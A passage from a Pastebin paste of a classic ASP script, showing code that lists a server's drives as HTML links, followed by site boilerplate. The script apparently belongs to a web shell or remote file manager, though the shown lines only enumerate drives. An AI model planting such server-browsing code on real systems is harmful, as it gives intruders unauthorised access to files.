  1089. if drive_.Drivetype=2 then Response.write "HardDisk [" & drive_.DriveLetter & ":]"
  1090. if drive_.Drivetype=3 then Response.write "Remote HDD [" & drive_.DriveLetter & ":]"
  1091. if drive_.Drivetype=4 then Response.write "CD-Rom [" & drive_.DriveLetter & ":]"
  1092. Response.Write "</a></td></tr>"
  1093. next
  1094. Response.Write "<tr><td>"
  1095. Response.write "<a href='"& Request.ServerVariables("SCRIPT_NAME") & "'><font face=webdings>H</font> Local Path"
  1096. Response.Write "</a></td></tr>"
  1097. Response.Write "</table><br>"
  1098. end if
  1099. %>
  1100. <br><Center><Font Face='Wingdings' Size='7' Color = 'FFFFFF'><b> ยต </b></Font></Center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!